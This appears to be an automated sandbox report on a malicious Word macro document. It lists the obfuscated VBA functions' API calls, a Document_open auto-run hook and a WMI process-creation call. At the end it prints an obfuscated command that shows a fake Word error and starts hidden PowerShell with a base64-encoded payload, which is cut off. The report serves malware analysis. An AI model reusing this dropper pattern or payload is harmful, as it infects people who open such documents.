                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: vlZuYFCC

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: mJzxEXG

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: bssipAJC

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: IpndaHM

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Mid

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Name

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Application

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: lscaG

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: wgusFA

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: HpOdl

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: PAyxzTsC

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: sVBjGLE

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: RmTjACo

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: zjQpkF

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: ClofCvn

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: tFspDCJEJ

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: CreateObject

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: rknGHpIJ

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: LGONCIz

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: chPFBOFy

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Mid

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Create

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Twt08i5xpa9fd0

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: L1e1dxo2wbinf3l6

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: rlKgn

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: igIuH

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: QgrUG

                                                                      LineInstructionMeta Information
                                                                      9

                                                                      Private Sub Document_open()

                                                                      10

                                                                      Xqcxarraokjbi

                                                                      executed
                                                                      11

                                                                      End Sub

                                                                      Module: Nst6otvnmgmpw

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Nst6otvnmgmpw"

                                                                      Executed Functions
                                                                      Function Xqcxarraokjbi, APIs: 284, Strings: 140, Number of lines: 158, Relevance: 752.658
                                                                      APIsMeta Information

                                                                      O9eax2mx6bn5xuv

                                                                      Content

                                                                      Bud375u79tqnjtr8hp

                                                                      bebkDqAH

                                                                      Paragraphs

                                                                      EWTFmUdCA

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      ueWFHDCC

                                                                      yigPu

                                                                      Paragraphs

                                                                      wTLHBUFzI

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      oSnKJGCv

                                                                      NVFQOFAXs

                                                                      Paragraphs

                                                                      KoPDIC

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      vlZuYFCC

                                                                      mJzxEXG

                                                                      Paragraphs

                                                                      bssipAJC

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      IpndaHM

                                                                      Mid

                                                                      Name

                                                                      Application

                                                                      lscaG

                                                                      Paragraphs

                                                                      wgusFA

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      HpOdl

                                                                      PAyxzTsC

                                                                      Paragraphs

                                                                      sVBjGLE

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      RmTjACo

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: nWADOALQ

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: EqstFcEf

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: CITOv

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: swJREBktH

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MllKTIJEc

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: fishDz

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: xvhwEkIi

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: vYqwDI

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MFcvbrIeP

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: HmUuEIbVG

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: gzBJqD

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: polxC

                                                                      zjQpkF

                                                                      Paragraphs

                                                                      ClofCvn

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      tFspDCJEJ

                                                                      CreateObject

                                                                      		CreateObject("winmgmts:win32_process")

                                                                      rknGHpIJ

                                                                      Paragraphs

                                                                      LGONCIz

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      chPFBOFy

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: nWADOALQ

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: EqstFcEf

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: CITOv

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: swJREBktH

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MllKTIJEc

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: fishDz

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: xvhwEkIi

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: vYqwDI

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MFcvbrIeP

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: HmUuEIbVG

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: gzBJqD

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: polxC

                                                                      Mid

                                                                      Len

                                                                      		Len(" sg yw ahsg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ah/sg yw ahcsg yw ah sg yw ahmsg yw ah^sg yw ahssg yw ah^sg yw ahgsg yw ah sg yw ah%sg yw ahusg yw ahssg yw ahesg yw ahrsg yw ahnsg yw ahasg yw ahmsg yw ahesg yw ah%sg yw ah sg yw ah/sg yw ahvsg yw ah sg yw ahWsg yw ahosg yw ah^sg yw ahrsg yw ahdsg yw ah sg yw ahesg yw ahxsg yw ahpsg yw ah^sg yw ahesg yw ahrsg yw ahisg yw ahesg yw ahnsg yw ah^sg yw ahcsg yw ahesg yw ahdsg yw ah sg yw ahasg yw ahnsg yw ah sg yw ahesg yw ahrsg yw ah^sg yw ahrsg yw ahosg yw ahrsg yw ah sg yw ahtsg yw ahrsg yw ahysg yw ahisg yw ah^sg yw ahnsg yw ahgsg yw ah sg yw ahtsg yw ahosg yw ah sg yw ahosg yw ahpsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ahtsg yw ahhsg yw ah^sg yw ahesg yw ah sg yw ahfsg yw ahisg yw ah^sg yw ahlsg yw ahesg yw ah.sg yw ah sg yw ah&sg yw ah sg yw ahpsg yw ah^sg yw ahosg yw ahwsg yw ahesg yw ah^sg yw ahrsg yw ahssg yw ah^sg yw ahhsg yw ahesg yw ah^sg yw ahlsg yw ahlsg yw ah^sg yw ah sg yw ah-sg yw ahwsg yw ah sg yw ahhsg yw ahisg yw ah^sg yw ahdsg yw ahdsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ah-sg yw ah^sg yw ahesg yw ah^sg yw ahnsg yw ahcsg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah IAAsg yw ahgAFsg yw ahMARsg yw ahQBUsg yw ahAC0sg yw ahAaQsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahgACsg yw ahAAdsg yw ahgBhsg yw ahAHIsg yw ahASQsg yw ahBhAsg yw ahEIAsg yw ahTABsg yw ahFADsg yw ahoAUsg yw ahABHsg yw ahAEIsg yw ahAIAsg yw ahAgAsg yw ahCgAsg yw ahIABsg yw ahbAFsg yw ahQAWsg yw ahQBQsg yw ahAGUsg yw ahAXQsg yw ahAoAsg yw ahCIAsg yw ahewAsg yw ahyAHsg yw ah0Aesg yw ahwA0sg yw ahAH0sg yw ahAewsg yw ahA1Asg yw ahH0Asg yw ahewAsg yw ahxAHsg yw ah0Aesg yw ahwAwsg yw ahAH0sg yw ahAewsg yw ahAzAsg yw ahH0Asg yw ahIgAsg yw ahgACsg yw ah0AZsg yw ahgAnsg yw ahAC4sg yw ahARAsg yw ahBpAsg yw ahHIAsg yw ahJwAsg yw ahsACsg yw ahcAbsg yw ahQAusg yw ahAEksg yw ahATwsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahTAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahARQsg yw ahBDAsg yw ahFQAsg yw ahbwBsg yw ahSAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahAUwsg yw ahB0Asg yw ahCcAsg yw ahLAAsg yw ahnAEsg yw ahUAJsg yw ahwApsg yw ahACksg yw ahAOwsg yw ahAgAsg yw ahHMAsg yw ahRQBsg yw ahUACsg yw ahAAKsg yw ahAAnsg yw ahADIsg yw ahAOQsg yw ahB4Asg yw ahCcAsg yw ahKwAsg yw ahnAGsg yw ahQAJsg yw ahwArsg yw ahACcsg yw ahANAsg yw ahBNAsg yw ahCcAsg yw ahKQAsg yw ahgACsg yw ahAAKsg yw ahAAgsg yw ahAFssg yw ahAVAsg yw ahBZAsg yw ahHAAsg yw ahRQBsg yw ahdACsg yw ahgAIsg yw ahgB7sg yw ahADcsg yw ahAfQsg yw ahB7Asg yw ahDEAsg yw ahfQBsg yw ah7ADsg yw ahIAfsg yw ahQB7sg yw ahADMsg yw ahAfQsg yw ahB7Asg yw ahDYAsg yw ahfQBsg yw ah7ADsg yw ahQAfsg yw ahQB7sg yw ahADAsg yw ahAfQsg yw ahB7Asg yw ahDUAsg yw ahfQAsg yw ahiACsg yw ahAALsg yw ahQBmsg yw ahACcsg yw ahATgsg yw ahBhAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahkAcsg yw ahwAnsg yw ahACwsg yw ahAJwsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahuAEsg yw ah4ARsg yw ahQB0sg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahC4Asg yw ahUwBsg yw ahFAHsg yw ahIAVsg yw ahgBpsg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahGUAsg yw ahUABsg yw ahPAGsg yw ahkAbsg yw ahgBUsg yw ahAG0sg yw ahAQQsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahHAGsg yw ahUAUsg yw ahgAnsg yw ahACwsg yw ahAJwsg yw ahBDAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahMAJsg yw ahwApsg yw ahACAsg yw ahAIAsg yw ahApAsg yw ahDsAsg yw ahJABsg yw ahYAGsg yw ahoAYsg yw ahgA2sg yw ahAHUsg yw ahAdQsg yw ahA5Asg yw ahD0Asg yw ahJABsg yw ahTAFsg yw ah8ANsg yw ahwBXsg yw ahACAsg yw ahAKwsg yw ahAgAsg yw ahFsAsg yw ahYwBsg yw ahoAGsg yw ahEAcsg yw ahgBdsg yw ahACgsg yw ahANgsg yw ahA0Asg yw ahCkAsg yw ahIAAsg yw ahrACsg yw ahAAJsg yw ahABDsg yw ahADksg yw ahANgsg yw ahBaAsg yw ahDsAsg yw ahJABsg yw ahBADsg yw ahIAOsg yw 